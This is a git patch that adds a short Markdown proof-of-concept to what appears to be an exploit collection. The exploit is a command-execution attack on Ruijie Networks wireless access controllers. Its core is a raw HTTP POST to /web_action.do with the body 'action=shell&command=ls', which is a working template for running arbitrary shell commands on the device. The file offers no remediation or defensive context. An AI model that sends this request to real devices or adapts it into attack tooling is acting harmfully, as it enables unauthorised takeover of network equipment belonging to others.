From de59d22084fc49ebaef40169e443ce52ca536fdf Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 27 Mar 2024 14:08:37 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=94=90=E6=8D=B7=E7=BD=91=E7=BB=9C?= =?UTF-8?q?=E6=97=A0=E7=BA=BFAC=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 锐捷网络无线AC命令执行.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 锐捷网络无线AC命令执行.md diff --git a/锐捷网络无线AC命令执行.md b/锐捷网络无线AC命令执行.md new file mode 100644 index 0000000..c98af3a --- /dev/null +++ b/锐捷网络无线AC命令执行.md @@ -0,0 +1,15 @@ +## 锐捷网络无线AC命令执行 + +![image](https://github.com/wy876/POC/assets/139549762/0ce6bf97-7771-4cd9-aebe-d7e3b9670ddc) + +## poc +``` +POST /web_action.do HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +action=shell&command=ls +``` + +![image](https://github.com/wy876/POC/assets/139549762/1e5644da-6ac6-4663-bf23-30371b69af52)